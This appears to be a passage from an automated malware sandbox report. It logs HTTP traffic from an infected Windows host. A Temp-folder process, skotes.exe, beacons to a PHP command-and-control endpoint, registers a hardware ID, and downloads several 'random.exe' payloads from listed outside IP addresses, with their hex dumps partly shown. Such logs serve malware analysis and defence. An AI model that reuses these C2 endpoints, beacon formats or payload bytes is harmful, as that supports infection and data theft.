Dec 16, 2024 11:04:02.029280901 CET	2472	OUT	Data Raw: 73 6d e2 2f 4d 9c 99 e5 7b a2 8c e5 fc 63 56 2e 7e 15 e2 d2 f2 30 33 25 76 82 b2 44 82 b4 0f 92 41 49 01 c8 44 71 14 0e 08 80 ac 67 18 9d ca de 0e ac 10 aa 2f 2b b2 2c c2 c6 95 50 9a 1f df 98 1a e1 19 6d a6 21 fd 5e 11 80 46 19 85 7b d2 e2 26 62 Data Ascii: sm/M{cV.~03%vDAIDqg/+,Pm!^F{&b#PUfLIWcE9!@}m#hP>Nk\#3e[B<"_&40J_]it=!I\lnp.@DU,=G_
Dec 16, 2024 11:04:02.149059057 CET	2472	OUT	Data Raw: 7d 41 be b9 b6 13 d8 60 00 74 dc 1c bd 9f 4b 42 9e b9 a6 01 89 54 09 7e 9b 31 17 ce 9e 17 a2 98 f0 9c 4f 8d 66 d3 98 fc 15 99 9a 5f b0 63 41 a8 51 50 69 96 c9 7d 74 a2 55 42 f5 79 51 85 ee 99 44 e1 e9 40 70 7a 83 fa b1 19 77 5e 5a 02 99 6f 88 c9 Data Ascii: }A`tKBT~1Of_cAQPi}tUByQD@pzw^ZoF;h><d%YoxIjjj~J{*J>:Ykn?e8[lE!LbUe&v<n15!rgU!BS@=
Dec 16, 2024 11:04:02.149085045 CET	4944	OUT	Data Raw: ee 45 89 d5 19 c6 10 2e b2 fc 0d 89 81 39 bd 24 0a 58 d3 55 fc e1 6e 0b 79 3f 10 ec 8c 73 dc c0 46 cb 78 b6 7a 57 1b 7f 33 ee 1a 19 60 08 b7 ad 92 6c f4 6b d6 0c fa 26 b1 23 b1 12 26 0c b8 05 2e ca 7c 0d 36 44 74 6b 10 e2 20 ac b4 71 1c aa cb f8 Data Ascii: E.9$XUny?sFxzW3`lk&#&.\|6Dtk qn4(8jj2[>8Sn<kXs}IM`]FCBV~t%a#<(HTp0 BGfA%;qUuPv[OB&hlxs~0?aD/1;Du?
Dec 16, 2024 11:04:02.149180889 CET	4944	OUT	Data Raw: c1 36 57 f7 3c bf 4f 01 c7 d8 15 15 45 5d de c5 cb 94 e9 ae a2 1c 08 22 b1 96 4a 8c 34 06 09 d8 a0 04 64 e7 bd 0c 69 98 32 37 86 c6 91 72 bc 15 a0 c3 6a 69 da d7 68 e7 60 f0 e3 3d a1 8b 93 cd 5e 39 dc 67 c8 94 6d 8c 96 21 25 a2 fd 49 b8 ef 44 9d Data Ascii: 6W<OE]"J4di27rjih`=^9gm!%IDkEf)fN&"c6iY14JB3W\|%F"P*5fVo77Z:`u8IwHwkLlh0;mRt zj,1BD,<
Dec 16, 2024 11:04:02.149207115 CET	2472	OUT	Data Raw: 8d 24 65 12 58 cf 6f e0 55 75 bf a4 1a d8 17 6d 03 b6 92 68 82 3c 7f e4 db 9c 84 41 0f e8 83 4f 03 83 5d ec 44 c2 5d bc 54 c0 08 de 00 be 32 a4 48 7a 93 d5 70 d5 37 b9 64 11 a3 91 52 5d c4 46 ba 91 9f 92 66 6c a6 1e 46 15 73 5d 33 46 6d 80 4c f5 Data Ascii: $eXoUumh<AO]D]T2Hzp7dR]FflFs]3FmLVn-\|%2s!jQ;h_VPll}8iHDf6b\|iD.E~O}<5E~1 g'qTz.C,gtJ{7\|b[4dCT~_=!J
Dec 16, 2024 11:04:02.194520950 CET	18964	OUT	Data Raw: aa fb a4 1a 33 1c 12 eb f4 64 e8 00 d1 a1 cf c8 02 c6 61 a7 5d 61 cc 3d e5 ce 1b aa c3 81 92 b2 9e 81 c6 68 ba 16 05 fb 37 e2 76 5d b1 fd 7f 23 d1 53 82 91 64 b1 6e 05 fd 79 70 9c 44 49 ef d9 a3 8e 8a 94 10 7f 9d b8 ed f8 4a 2b 02 ca f3 ce 55 f7 Data Ascii: 3da]a=h7v]#SdnypDIJ+UX"V&jFR&T;l9jNr:IQ<M)k%}PTsbyO8&Qpj;^^ht\|}83VsgVApKseyJz+0e<@ \!1dC
Dec 16, 2024 11:04:03.656845093 CET	255	IN	HTTP/1.1 200 OK server: nginx date: Mon, 16 Dec 2024 10:04:03 GMT content-type: text/plain; charset=utf-8 content-length: 2 x-ratelimit-limit: 30 x-ratelimit-remaining: 28 x-ratelimit-reset: 1734345241 etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49960	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:04:08.062005043 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 36 30 34 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016045001&unit=246122658369
Dec 16, 2024 11:04:09.390919924 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:04:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49974	185.215.113.16	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:04:09.523977995 CET	55	OUT	GET /well/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 16, 2024 11:04:10.864272118 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:04:10 GMT Content-Type: application/octet-stream Content-Length: 964608 Last-Modified: Mon, 16 Dec 2024 09:27:34 GMT Connection: keep-alive ETag: "675ff286-eb800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 77 f2 5f 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 08 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED] Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPELw_g"w@h@@@d\|@Lu4@.text `.rdata@@.datalpH@.rsrcL@N@@.relocuvB@B
Dec 16, 2024 11:04:10.864310980 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00 Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY
Dec 16, 2024 11:04:10.864366055 CET	1236	IN	Data Raw: b7 6c fd ff ff 8b ce e8 f7 ba 00 00 33 c9 c7 46 0c 01 00 00 00 89 0e 8b 03 8b 40 04 03 c7 39 88 98 fb ff ff 74 35 89 4d fc 51 8d 4d fc 51 8d 88 94 fb ff ff e8 2f 05 00 00 8b 03 8d 8f 98 fb ff ff 8b 40 04 03 c8 e8 c6 04 00 00 8b 03 8b 40 04 03 c7 Data Ascii: l3F@9t5MQMQ/@@ulIOkOu3_OO_`d<IvY\|#l)\DItv
Dec 16, 2024 11:04:10.864402056 CET	1236	IN	Data Raw: 7f 00 00 8d 8e 9c 00 00 00 e8 10 7f 00 00 8d 8e 8c 00 00 00 e8 05 7f 00 00 8d 4e 08 5e e9 00 00 00 00 56 57 8b f9 33 f6 8b 44 f7 04 85 c0 0f 85 4e 0d 04 00 46 83 fe 10 7c ee 5f 5e c3 53 56 8b f1 33 db 57 38 5e 09 0f 85 54 0d 04 00 38 5e 08 75 1c Data Ascii: N^VW3DNF\|_^SV3W8^T8^uNy8tQ~^_^[VN j@VYY^USVW{{u)E0~7GC{_^[u@]8@83Md3f2MA4Mj
Dec 16, 2024 11:04:10.864437103 CET	1236	IN	Data Raw: 00 5f 5e 5b c9 c2 08 00 49 eb 89 41 eb 86 8d 47 01 89 02 eb dc e8 5b 01 00 00 84 c0 74 0e 8b ca e8 50 01 00 00 84 c0 74 03 b0 01 c3 32 c0 c3 55 8b ec 51 51 56 8b f1 80 be 6d 01 00 00 00 8b 86 68 01 00 00 75 53 ff 70 04 e8 1e 09 00 00 8d 4d ff c7 Data Ascii: _^[IAG[tPt2UQQVmhuSpMEQMQPx$}dtmhuIEA^j@0I0uuUQQVW}EPEEPWNx8OEfx3
Dec 16, 2024 11:04:10.864470959 CET	1236	IN	Data Raw: 00 83 f8 12 0f 8d e0 04 04 00 83 e8 04 83 f8 0a 77 94 ff 24 85 85 27 40 00 6a 7f 58 66 3b d8 0f 84 c2 06 04 00 8b 19 33 c0 66 85 c0 74 1c 8b 45 90 40 89 45 90 8b 1c 81 0f b7 43 08 66 3b 85 50 ff ff ff 75 e4 e9 9d 06 04 00 83 3b 05 75 df 8b 04 91 Data Ascii: w$'@jXf;3ftE@ECf;Pu;u3f9X'ULUf9Y]79^99L99!:9#, rU]
Dec 16, 2024 11:04:10.864505053 CET	1236	IN	Data Raw: 85 79 02 04 00 38 5f 08 75 1c 8b 47 04 6a 08 50 8b 70 04 e8 c8 d5 01 00 59 59 89 77 04 88 5f 09 ff 0f 5f 5e 5b c3 b3 01 eb f3 55 8b ec 56 8b f1 80 7e 09 00 0f 85 5f 02 04 00 6a 08 e8 ad d5 01 00 59 8b 4d 08 8b 09 89 08 8b 4e 04 89 48 04 89 46 04 Data Ascii: y8_uGjPpYYw__^[UV~_jYMNHF^]UQSV3W8^?8^u7~G0EtO ,O$j8WIEYYF^_^[UWVj8)YuON0w^_]UVuWO
Dec 16, 2024 11:04:10.864634037 CET	1236	IN	Data Raw: a3 88 13 4d 00 ff d6 57 ff 35 8c 13 4d 00 ff d6 5f 5e c3 55 8b ec 83 ec 40 a1 58 13 4d 00 56 33 f6 a3 04 19 4d 00 6a 0f c7 45 c4 30 00 00 00 c7 45 c8 2b 00 00 00 89 75 d0 c7 45 d4 1e 00 00 00 89 45 d8 89 75 e0 ff 15 3c c7 49 00 89 45 e4 8b 45 10 Data Ascii: MW5M_^U@XMV3MjE0E+uEEu<IEEEEEEPuEIE}A0IhIfM IMEPEE;Ijjj!jjIh5M\M4IPj5\MI5`M^UVW
Dec 16, 2024 11:04:10.864667892 CET	1236	IN	Data Raw: cc 00 00 00 2d 8f 00 00 00 0f 84 d8 fc 03 00 48 83 e8 01 0f 84 ba fc 03 00 2d ff 01 00 00 0f 84 94 fc 03 00 2d ef 00 00 00 0f 84 8f 00 00 00 3b 3d 28 25 4d 00 0f 84 58 fc 03 00 ff 75 0c ff 75 08 57 56 ff 15 08 c7 49 00 5f 5e 5b 8b e5 5d c3 85 c0 Data Ascii: -H--;=(%MXuuWVI_^[]tt%jVIM73jhjV$IhI I=M(%MuIMuQQVMjIU<SVWj,EE0jP
Dec 16, 2024 11:04:10.864705086 CET	1236	IN	Data Raw: 4d 00 ff 53 56 57 33 db c7 05 94 19 4d 00 01 01 01 01 68 58 cb 49 00 89 1d 90 19 4d 00 66 89 1d 98 19 4d 00 c6 05 9a 19 4d 00 01 c7 05 9c 19 4d 00 09 00 00 00 89 1d a8 19 4d 00 e8 0a 66 00 00 68 3c cb 49 00 b9 bc 19 4d 00 e8 fb 65 00 00 b9 cc 19 Data Ascii: MSVW3MhXIMfMMMMfh<IMeMrMrMrM4MMMMMMMMj_MMMMMMMMM M$M0Mrud
Dec 16, 2024 11:04:10.984503984 CET	1236	IN	Data Raw: 53 52 51 ff 15 18 c0 49 00 85 c0 75 4f 8b 45 0c 57 8d 3c 00 8d 45 fc 89 7d fc 50 56 53 53 ff 75 08 ff 75 f8 ff 15 20 c0 49 00 85 c0 75 15 8b 45 fc d1 e8 89 45 fc 3b 45 0c 73 18 33 c9 66 89 0c 46 b3 01 ff 75 f8 ff 15 1c c0 49 00 8a c3 5f 5e 5b c9 Data Ascii: SRQIuOEW<E}PVSSuu IuEE;Es3fFuI_^[3fD72V\|M]8MW3=MZ=@M M@I95(Mv"$Mj4$MYY<F;5(Mr5$M=(MYMM<I5M

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49976	185.215.113.206	80	5848	C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:04:09.832540989 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 16, 2024 11:04:11.178512096 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:04:10 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 16, 2024 11:04:11.183840036 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJEBGHIEBFIJKECBKFHD Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 45 42 47 48 49 45 42 46 49 4a 4b 45 43 42 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 44 38 41 42 35 37 45 39 31 31 39 33 34 36 38 35 35 32 38 34 39 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 42 47 48 49 45 42 46 49 4a 4b 45 43 42 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 42 47 48 49 45 42 46 49 4a 4b 45 43 42 4b 46 48 44 2d 2d 0d 0a Data Ascii: ------HJEBGHIEBFIJKECBKFHDContent-Disposition: form-data; name="hwid"1D8AB57E91193468552849------HJEBGHIEBFIJKECBKFHDContent-Disposition: form-data; name="build"stok------HJEBGHIEBFIJKECBKFHD--
Dec 16, 2024 11:04:11.637201071 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:04:11 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49999	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:04:15.505496025 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 36 30 34 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016046001&unit=246122658369
Dec 16, 2024 11:04:16.851337910 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:04:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	50005	185.215.113.16	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:04:16.997049093 CET	54	OUT	GET /off/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 16, 2024 11:04:18.325011015 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:04:17 GMT Content-Type: application/octet-stream Content-Length: 2786816 Last-Modified: Mon, 16 Dec 2024 09:28:02 GMT Connection: keep-alive ETag: "675ff2a2-2a8600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 58 b2 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ @+X`Ui` @ @.rsrc`2@.idata 8@tzzztmlq@$:@jxlaistz ^@.taggant@+"d@
Dec 16, 2024 11:04:18.325086117 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:04:18.325123072 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:04:18.325156927 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:04:18.325212955 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:04:18.325246096 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:04:18.325283051 CET	744	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:04:18.325320005 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:04:18.325357914 CET	1236	IN	Data Raw: 0c 53 cd 7b 6b 37 38 2e 5b 59 16 cf 1b 9e c1 16 2c dc 05 37 3f 31 31 b0 14 29 cc 47 95 67 12 29 52 e0 b6 37 66 c0 d7 f4 b0 37 fb 42 81 70 a2 83 6b 42 0a b0 75 f0 c1 97 92 64 ce a9 c3 1a db cb 9d 6a 06 50 2d b6 52 8a bc c4 cc c5 2e 73 d8 3f 39 02 Data Ascii: S{k78.[Y,7?11)Gg)R7f7BpkBudjP-R.s?9qrbw(iX/3Y18iU8[n(2t[(n3/ihn0/Ew0;mR~[0![R/1`t%]d}v=w1E=D5
Dec 16, 2024 11:04:18.325397015 CET	1236	IN	Data Raw: e9 1d c4 83 22 dd 1a b5 79 94 90 da ce 29 0f 93 46 4a 05 0b b6 2f e0 ee 4d 73 bd fc c1 1a ac 52 7f 1a e3 86 b7 99 18 62 08 3b e8 51 eb f7 b9 2b f9 4c d3 44 0e 2e 5f 23 4d b7 19 04 f0 cc 59 31 2f 41 13 d5 36 1f d4 10 b3 39 cb 0e 44 4e cc c4 47 84 Data Ascii: "y)FJ/MsRb;Q+LD._#MY1/A69DNGnHVK4Wj)QRz'Y,r\v/VX]p*p`b.tS']-7Y3F_FeO7iK~V\Ggcp_Un<sn
Dec 16, 2024 11:04:18.445664883 CET	1236	IN	Data Raw: b5 e7 a6 94 7c fb 38 be 4f 27 ea f5 cc 1b 5c 08 a4 40 56 33 b6 56 38 d2 7c 29 87 cf 56 bb 2a 12 63 42 b5 f4 09 8f b6 52 12 26 63 64 21 fe 35 f8 4a e1 d8 ee e7 41 b1 68 f1 42 88 3c 59 a1 95 17 44 ec d7 ff 57 3c 0a bf c3 f7 80 b3 dd 23 fb 51 6a 4a Data Ascii: \|8O'\@V3V8\|)VcBR&cd!5JAhB<YDW<#QjJkdvL/DTgj^~YIq iv({mB`Itw$OxgL^mIBj+m6,l[QwxPr&RAFy8FDVK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	50040	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:04:25.682600975 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 36 30 34 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016047001&unit=246122658369
Dec 16, 2024 11:04:27.033499002 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:04:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	50048	31.41.244.11	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:04:27.212357044 CET	60	OUT	GET /files/flava/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 16, 2024 11:04:28.539556026 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:04:28 GMT Content-Type: application/octet-stream Content-Length: 1834496 Last-Modified: Sat, 14 Dec 2024 21:12:38 GMT Connection: keep-alive ETag: "675df4c6-1bfe00" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 62 fe 59 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 cc 03 00 00 b0 00 00 00 00 00 00 00 80 48 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 48 00 00 04 00 00 e2 b0 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELbYgH@H@T0h 1 H@.rsrc X@.idata 0Z@ )@\@ubvmxkob.z^@xdawalmhpH@.taggant0H"@
Dec 16, 2024 11:04:28.539640903 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:04:28.539655924 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:04:28.539702892 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:04:28.539721012 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
